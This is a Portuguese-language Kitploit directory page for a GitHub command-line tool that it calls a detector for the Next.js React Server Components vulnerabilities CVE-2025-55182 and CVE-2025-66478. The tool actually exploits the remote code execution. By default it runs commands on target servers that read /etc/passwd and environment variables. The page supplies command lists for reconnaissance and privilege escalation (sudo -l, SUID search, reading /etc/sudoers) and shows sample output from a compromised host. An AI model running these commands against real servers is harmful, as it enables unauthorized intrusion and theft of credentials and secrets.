Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182 — Uma ferramenta de linha de comando para detectar CVE-2025-55182 e CVE-2025-66478 em aplicações Next.js usando React Server Components. | Kitploit
Ferramentas/GitHubGitHub/rix4uni/cve-2025-55182
ReconhecimentoScanners de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoComando e Controle
GitHubrix4uni/cve-2025-55182

CVE-2025-55182

Uma ferramenta de linha de comando para detectar CVE-2025-55182 e CVE-2025-66478 em aplicações Next.js usando React Server Components.

Ver Repositório
614há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55182

Uma ferramenta de linha de comando para detectar CVE-2025-55182 e CVE-2025-66478 em aplicações Next.js que usam React Server Components.

🚀 Instalação

root@kitploit:~
wget -q -O /usr/bin/CVE-2025-55182 https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/CVE-2025-55182 && chmod +x /usr/bin/CVE-2025-55182
wget -q -O /usr/bin/reportgenerator https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/reportgenerator && chmod +x /usr/bin/reportgenerator

🛠️ Uso

Scanner CVE-2025-55182

Sintaxe Básica

root@kitploit:~
CVE-2025-55182 -d https://example.com

Opções

Nota: Se nenhuma opção de comando for fornecida, os comandos padrão são executados.

Comandos Padrão

A ferramenta executa estes comandos por padrão:

  1. cat /etc/os-release - Informações do SO
  2. whoami - Usuário atual
  3. pwd - Diretório de trabalho atual
  4. id - ID do usuário e grupos
  5. uname -a - Informações do sistema
  6. hostname -I - Interfaces de rede
  7. ls -la - Listagem de diretório
  8. cat /etc/passwd - Contas de usuário
  9. env - Variáveis de ambiente
  10. ps aux - Processos em execução

Gerador de Relatórios

A ferramenta reportgenerator gera automaticamente relatórios profissionais de divulgação de vulnerabilidades a partir dos resultados da varredura.

Características

  • Varredura paralela de múltiplos alvos
  • Numeração automática que preserva relatórios existentes (sem sobrescrita)
  • Relatórios profissionais em markdown com seção de Divulgação de Vulnerabilidade de Segurança
  • Nome do pesquisador personalizável e arquivo de entrada

Uso Básico

root@kitploit:~
# Create a file with target domains
echo -e "https://target1.com\nhttps://target2.com" > subs.txt

# Run report generator
reportgenerator

Opções

FlagDescriçãoPadrão
--fileArquivo de entrada contendo domínios alvosubs.txt
--userNome do pesquisador para a seção de divulgaçãoBhagirath Saxena

Exemplos

root@kitploit:~
# Use default settings (subs.txt, Bhagirath Saxena)
reportgenerator

# Use custom target file
reportgenerator --file targets.txt

# Use custom researcher name
reportgenerator --user "John Doe"

# Use both custom options
reportgenerator --file my-targets.txt --user "Jane Smith"

Estrutura de Saída

Os relatórios são gerados em dois diretórios:

  • textfile/ - Saída bruta da varredura (numerada: 1.txt, 2.txt, etc.)
  • mdfile/ - Relatórios profissionais em markdown (numerados: 1.md, 2.md, etc.)

Nota: O recurso de numeração automática garante que relatórios existentes nunca sejam sobrescritos. Novas varreduras continuam a partir do número existente mais alto.

Formato do Relatório

Cada relatório gerado inclui:

  1. Divulgação de Vulnerabilidade de Segurança - Carta de introdução profissional
  2. Alvo - O domínio testado
  3. Comandos Executados - Lista de comandos executados durante o teste
  4. Resumo da Vulnerabilidade - Detalhes do CVE e avaliação de impacto
  5. Detalhes de Exploração - Saídas de comandos com status de execução
  6. Resumo da Execução - Tabela mostrando sucesso/fracasso de cada comando
  7. Análise de Impacto - Avaliação de gravidade e observações
  8. Recomendações - Etapas de remediação para a equipe de segurança
  9. Referências - Links para detalhes do CVE e avisos de segurança

🎨 Exemplos de Saída

Exploração Bem-Sucedida

root@kitploit:~
▼ 🎯 ALVO: https://vulnerable-app.com
▼ 📋 COMANDOS A EXECUTAR: 10
  • cat /etc/os-release
  • whoami
  • pwd
  • id
  • uname -a
  • hostname -I
  • ls -la
  • cat /etc/passwd
  • env
  • ps aux

[1/10] Executando: cat /etc/os-release
▼ 💻 INFORMAÇÕES DO SO
║ NAME="Ubuntu"
║ VERSION="22.04.3 LTS (Jammy Jellyfish)"
║ ID=ubuntu
║ ID_LIKE=debian
║ PRETTY_NAME="Ubuntu 22.04.3 LTS"
║ ...

[2/10] Executando: whoami
▼ 👤 USUÁRIO ATUAL
║ www-data
...

[3/10] Executando: pwd
▼ 📂 DIRETÓRIO ATUAL
║ /var/www/html
...

Sucesso Parcial

root@kitploit:~
[6/10] Executando: hostname -I
╔════════════════════════════════════════════════════════════╗
║ Comando falhou: hostname -I
║ Este comando pode não estar disponível ou o servidor o rejeitou
╚════════════════════════════════════════════════════════════╝

[!] Tentando comando de rede alternativo...
▼ 🌐 INTERFACES DE REDE (alternativo)
║ 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
║     link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
║     inet 127.0.0.1/8 scope host lo
║        valid_lft forever preferred_lft forever
...

🔧 Detalhes Técnicos

Vulnerabilidade

  • CVE: CVE-2025-55182
  • Tipo: Poluição de Protótipo → RCE
  • Afetado: Aplicações Next.js com configurações específicas
  • Vetor: HTTP POST com multipart/form-data manipulado
  • Impacto: Execução remota de código não autenticada como usuário da aplicação

📚 Referências

  • Detalhes do CVE-2025-55182
  • Avisos de Segurança do Next.js

Exemplos do diretório commands/:

Crie arquivos de comando de exemplo para diferentes cenários:

root@kitploit:~
# commands/basic-recon.txt
whoami
id
uname -a
cat /etc/os-release
hostname
root@kitploit:~
# commands/network-recon.txt
ifconfig
netstat -tulpn
iptables -L
cat /etc/hosts
cat /etc/resolv.conf
root@kitploit:~
# commands/privilege-escalation.txt
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/sudoers
ls -la /root/
Baixar ferramenta
OpçãoDescriçãoPadrão
-d, --domainURL alvo (adiciona https:// automaticamente se não houver protocolo)http://localhost:3000
-c, --commandComando único a executar-
-m, --multipleMúltiplos comandos separados por ponto e vírgula-
-f, --fileArquivo contendo comandos (um por linha)-
-h, --helpMostrar mensagem de ajuda-